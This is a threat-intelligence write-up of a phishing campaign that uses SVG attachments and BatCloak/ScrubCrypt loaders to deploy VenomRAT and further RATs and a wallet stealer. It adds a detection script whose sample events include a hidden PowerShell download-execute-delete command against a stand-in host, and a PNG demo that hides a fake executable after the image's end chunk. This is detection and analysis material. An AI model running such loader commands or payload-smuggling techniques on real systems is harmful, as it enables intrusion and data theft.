Attackers are using phishing emails with SVG attachments to trick users into downloading a ZIP file that contains a batch script obfuscated with BatCloak. That script stages ScrubCrypt, which in turn deploys VenomRAT on compromised Microsoft Windows machines.
VenomRAT then connects to a command and control (C2) server to fetch additional malware, including Remcos, XWorm, NanoCore, and a cryptocurrency wallet stealer. The chain shows how attackers layer scripting, obfuscation, and living-off-the-land tooling to bypass traditional security solutions.
The attack begins with a phishing email carrying an SVG attachment. No browser vulnerability is needed: an SVG is an XML document that can embed script, and when the victim opens the file the script drops a ZIP archive containing an obfuscated batch script (an HTML-smuggling style delivery).
The script, most likely generated by BatCloak, uses PowerShell to download a payload disguised as an image file, executes it in a hidden window, and then deletes the downloaded files to cover its tracks.
The downloaded file, named "pointer.cmd", is a ScrubCrypt batch script. It carries Base64-encoded, AES-CBC-encrypted payloads that it decrypts at run time to deploy two components.
According to Fortinet, the first component establishes persistence. It checks whether it is running with administrator rights: if so, it creates a scheduled task named "OneNote 83701" that runs the script at logon with the highest privileges; otherwise it copies itself to the user's Startup folder. It then loads and executes an in-memory assembly containing VenomRAT.
The second component disables defensive telemetry by bypassing AMSI and ETW before the RAT runs.
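The loader behaviour described above (hidden PowerShell download of an image-named file that is executed and deleted, a highest-privilege logon task, or a script dropped into the Startup folder) is easy to hunt for in process-creation telemetry. The script below is an added example written for this page, not code from Fortinet's report or from the malware: it runs a handful of rules over constructed, Sysmon-style events. The field names, file paths, URL, and the "OneNote 83701" task name in the sample data are assumptions for illustration.

```python
import re
from dataclasses import dataclass
from typing import Callable, List, Tuple


@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


# Constructed sample telemetry (not captured from a real incident).
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell.exe -WindowStyle Hidden -c "iwr http://example.invalid/pointer.jpg -OutFile $env:TEMP\pointer.cmd; start $env:TEMP\pointer.cmd; rm $env:TEMP\pointer.cmd"'),
    ProcEvent(r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\System32\schtasks.exe",
              r'schtasks /create /tn "OneNote 83701" /sc onlogon /rl highest /tr "C:\Users\alice\AppData\Roaming\pointer.cmd"'),
    ProcEvent(r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\System32\cmd.exe",
              r'cmd /c copy pointer.cmd "C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pointer.cmd"'),
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\notepad.exe",
              r"notepad.exe report.txt"),  # benign control event
]

SCRIPT_EXT = r"\.(?:cmd|bat|ps1|vbs|js)\b"
IMAGE_URL = re.compile(r"https?://\S+\.(?:jpe?g|png|gif|bmp)\b", re.I)
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
DOWNLOAD_CMDLET = re.compile(r"\b(?:iwr|invoke-webrequest|downloadfile|downloadstring|curl|wget)\b", re.I)
DELETE_CMD = re.compile(r"\b(?:rm|del|ri|remove-item)\b", re.I)
STARTUP_DIR = re.compile(r"\\start menu\\programs\\startup\\", re.I)
TASK_HIGHEST = re.compile(r"/rl\s+highest", re.I)
TASK_LOGON = re.compile(r"/sc\s+onlogon", re.I)
TASK_NAME = re.compile(r'/tn\s+"?onenote\s+\d+', re.I)  # name pattern from the report
TASK_ACTION = re.compile(r'/tr\s+"?[^"]*' + SCRIPT_EXT, re.I)

POWERSHELL = ("powershell.exe", "pwsh.exe")


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def hidden_powershell_image_download(ev: ProcEvent) -> bool:
    """PowerShell with a hidden window fetching a URL that ends in an image extension."""
    cl = ev.command_line
    return (_basename(ev.image) in POWERSHELL
            and bool(HIDDEN_WINDOW.search(cl))
            and bool(DOWNLOAD_CMDLET.search(cl))
            and bool(IMAGE_URL.search(cl)))


def download_execute_delete(ev: ProcEvent) -> bool:
    """Same PowerShell command line downloads something and removes a file afterwards."""
    cl = ev.command_line
    return (_basename(ev.image) in POWERSHELL
            and bool(DOWNLOAD_CMDLET.search(cl))
            and bool(DELETE_CMD.search(cl)))


def privileged_logon_task(ev: ProcEvent) -> bool:
    """schtasks creating a highest-privilege task that runs a script at logon."""
    cl = ev.command_line
    return (_basename(ev.image) == "schtasks.exe"
            and "/create" in cl.lower()
            and bool(TASK_HIGHEST.search(cl))
            and bool(TASK_LOGON.search(cl) or TASK_NAME.search(cl))
            and bool(TASK_ACTION.search(cl)))


def startup_folder_script_drop(ev: ProcEvent) -> bool:
    """A script file being written into the per-user Startup folder."""
    cl = ev.command_line
    return bool(STARTUP_DIR.search(cl) and re.search(SCRIPT_EXT, cl, re.I))


RULES: List[Callable[[ProcEvent], bool]] = [
    hidden_powershell_image_download,
    download_execute_delete,
    privileged_logon_task,
    startup_folder_script_drop,
]


def hunt(events: List[ProcEvent]) -> List[Tuple[str, int]]:
    """Return (rule name, event index) for every rule that fires on every event."""
    return [(rule.__name__, i) for i, ev in enumerate(events) for rule in RULES if rule(ev)]


if __name__ == "__main__":
    for name, idx in hunt(SAMPLE_EVENTS):
        print(f"{name}: {SAMPLE_EVENTS[idx].command_line}")
```

Each rule is deliberately narrow on the combination that matters (hidden window plus download plus image extension, or task creation plus highest run level plus script action) rather than on any one token, which keeps the noise from legitimate administration low while still catching renamed scripts and task names.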
Venom RAT Plugins:
VenomRAT, a RAT derived from QuasarRAT, stores its configuration Base64-encoded and AES-CBC-encrypted and decrypts it to obtain its C2 server details. After an initial check-in that sends victim information, VenomRAT keeps the channel open to receive additional plugins.
The plugins arrive as "save_Plugin" directives and are typically DLLs such as "SendFile.dll"; once loaded, they parse further instructions delivered as "plug_in" files from the C2 server.
The behaviour of each plugin appears to depend on the filename extracted from the directive, and the plugins observed can run PowerShell commands for a range of malicious purposes.
ScrubCrypt deploys Venom RAT v6.0.3, which includes keylogging functionality. The RAT is carried inside a heavily obfuscated script within ScrubCrypt, and the loader bypasses AMSI and ETW before launching it.
Venom RAT then harvests data from the host and transmits it to a C2 endpoint whose address is retrieved from Pastebin.
For NanoCore, an obfuscated VBS script on the compromised device downloads a steganographic image that hides encoded .NET malware within its data. The decoded .NET component establishes persistence, checks for virtual environments, fetches additional data, and finally executes NanoCore through RegAsm.
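Hiding an encoded .NET binary inside an image, as the NanoCore stage does, usually means appending or embedding a Base64 blob that the loader cuts out with fixed delimiters; the picture still renders normally. The code below is an added example for this page, not Fortinet's tooling or the malware's decoder. It builds a constructed 1x1 PNG, smuggles a fake PE after the IEND chunk, then shows how an analyst can walk the PNG chunk structure, recover whatever follows IEND, and decode it. The delimiter strings, the fake payload, and the function names are assumptions; the structural check (a clean PNG has nothing after IEND) holds for any PNG.

```python
import base64
import binascii
import struct
import zlib
from typing import Optional

PNG_SIG = b"\x89PNG\r\n\x1a\n"
# Delimiters are an assumption for this example; real loaders use their own.
START_TAG = b"<<BASE64_START>>"
END_TAG = b"<<BASE64_END>>"


def _chunk(ctype: bytes, data: bytes) -> bytes:
    """Encode one PNG chunk: length, type, data, CRC32 over type+data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def build_png(payload: Optional[bytes] = None) -> bytes:
    """Constructed 1x1 RGB PNG; if payload is given, smuggle it Base64-encoded after IEND."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)  # 1x1, 8-bit, RGB
    idat = zlib.compress(b"\x00\x00\x00\x00")  # filter byte + one black pixel
    png = PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", idat) + _chunk(b"IEND", b"")
    if payload is None:
        return png
    return png + START_TAG + base64.b64encode(payload) + END_TAG


def bytes_after_iend(data: bytes) -> bytes:
    """Walk the chunk list and return everything after IEND (empty for a clean file)."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    pos = len(PNG_SIG)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        pos += 12 + length  # 4 length + 4 type + data + 4 crc
        if ctype == b"IEND":
            return data[pos:]
    raise ValueError("no IEND chunk (truncated or not a PNG)")


def extract_payload(data: bytes) -> Optional[bytes]:
    """Cut the delimited blob out of the trailing bytes (or use all of them) and Base64-decode it."""
    tail = bytes_after_iend(data)
    if not tail:
        return None
    s, e = tail.find(START_TAG), tail.find(END_TAG)
    blob = tail[s + len(START_TAG):e] if s != -1 and e > s else tail.strip()
    try:
        return base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError):
        return None  # trailing data that is not Base64: still suspicious, but not this scheme


def looks_like_pe(blob: Optional[bytes]) -> bool:
    """Cheap triage: a decoded stage that starts with the MZ header deserves a closer look."""
    return bool(blob) and blob[:2] == b"MZ"


if __name__ == "__main__":
    sample = build_png(b"MZ" + b"\x90" * 32 + b"This program cannot be run in DOS mode")
    print("embedded PE found:", looks_like_pe(extract_payload(sample)))
```

A real sample from this campaign would be checked the same way: render-valid image, non-empty tail after IEND (or after the JPEG end-of-image marker for JPEGs), and an MZ header once the blob is decoded. Confirming that the PE is a .NET assembly would additionally mean parsing its CLI header, which this example leaves out.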
VenomRAT delivers XWorm, another RAT, through a VBS script disguised as a plugin. The VBS triggers a PowerShell download of the next stage, which is padded with junk comments to hinder analysis; that stage uses process hollowing to inject XWorm's final shellcode into a legitimate process.
Remcos, a RAT marketed as remote management software, gives attackers full control of a compromised system once delivered. Its configuration is stored encrypted in the binary's "SETTINGS" resource and can be decrypted to reveal the details of its operation, including the C2 settings.
The stealer plugin, delivered through obfuscated VBS and .NET stages, injects a payload that collects cryptocurrency wallet data along with Foxmail and Telegram information. It locates the relevant applications by file path and registry key and sends the stolen data, together with the execution path, to the C2 server.
The published Indicators of Compromise (IOCs) consist of malicious URLs, most of them pointing at image files that carry obfuscated payloads, and domain names used for C2 communication.
The domains are several subdomains under duckdns.org, a free dynamic DNS service that is frequently abused to host C2 infrastructure, and the research also lists file hashes for the malware samples.